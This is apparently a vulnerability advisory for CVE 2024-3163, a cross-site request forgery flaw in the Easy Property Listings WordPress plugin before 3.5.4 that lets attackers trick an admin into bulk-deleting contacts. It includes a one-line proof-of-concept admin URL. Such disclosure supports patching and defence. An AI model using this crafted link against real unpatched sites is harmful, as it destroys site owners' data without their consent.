Easy Property Listings < 3.5.4 – Arbitrary Contact Deletion via CSRF | CVE 2024-3163 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when deleting contacts in bulk, which could allow attackers to make a logged in admin delete them via a CSRF attack

Proof of Concept

Make an admin open a link where `<<ID_TO_DELETE>>` is a contact: 

`https://example.com/wp-admin/admin.php?action=bulk-delete&bulk-delete%5B%5D=<<ID_TO_DELETE>>
&action2=bulk-delete&page=epl-contacts&view=contacts`

Affects Plugins

easy-property-listings

Fixed in 3.5.4

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

f89c8654-5486-4939-880d-101f33d359c0

Timeline

Publicly Published

2024-08-22 (about 1 year ago)

Added

2024-08-22 (about 1 year ago)

Last Updated

2024-08-22 (about 1 year ago)

Other

Published

Title

Published

2022-12-02

Title

Chained Quiz < 1.3.2.5 - Submitted Quiz Response Deletion via CSRF

Published

2025-02-24

Title

WP-PostRatings Cheater <= 1.5 - Cross-Site Request Forgery

Published

2023-11-19

Title

Customer Reviews for WooCommerce < 5.38.2 - Cross-Site Request Forgery via manual review reminders

Published

2022-05-23

Title

One Click Plugin Updater <= 2.4.14 - Arbitrary Settings Update via CSRF

Published

2020-09-16

Title

Feed Them Social < 2.8.7 - Cross-Site Request Forgery